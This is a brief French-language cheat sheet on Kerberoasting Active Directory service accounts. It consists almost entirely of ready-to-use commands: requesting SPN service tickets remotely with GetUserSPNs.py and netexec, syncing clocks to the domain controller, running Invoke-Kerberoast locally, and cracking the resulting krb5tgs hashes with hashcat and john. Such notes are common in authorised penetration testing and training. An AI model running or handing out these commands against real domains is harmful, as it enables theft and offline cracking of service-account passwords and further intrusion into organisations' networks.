Kerberoast
À distance
GetUserSPNs.py -request -dc-ip <dc ip> <domain>/<user> -save -outputfile kerberoast.txt
Tip
Si l’erreur suivante apparait [-] Kerberos SessionError: KRB_AP_ERR_SKEW(Clock skew too great)
, c’est que la cible et l’attaquant ne partage pas le même temps. Il est donc nécessaire de les synchroniser à l’aide de ntpdate <dc ip>
.
Une fois les jetons kerberoastable récupérés, il est possible d’utiliser netexec afin de récupérer les hashes des jetons récupérés.
nxc ldap <dc_ip> -u '<user>' -p '<password>' --kerberoasting kerberoastable.txt
Il est ensuite possible de cracker les hashes avec john ou hashcat:
hashcat -m 13100 kerberoast.txt $wordlist
john --format=krb5tgs --wordlist=$wordlist kerberoast.txt
En local
Import-Module .\Invoke-Kerberoast.ps1
Invoke-Kerberoast
john --format=krb5tgs /tmp/tocrack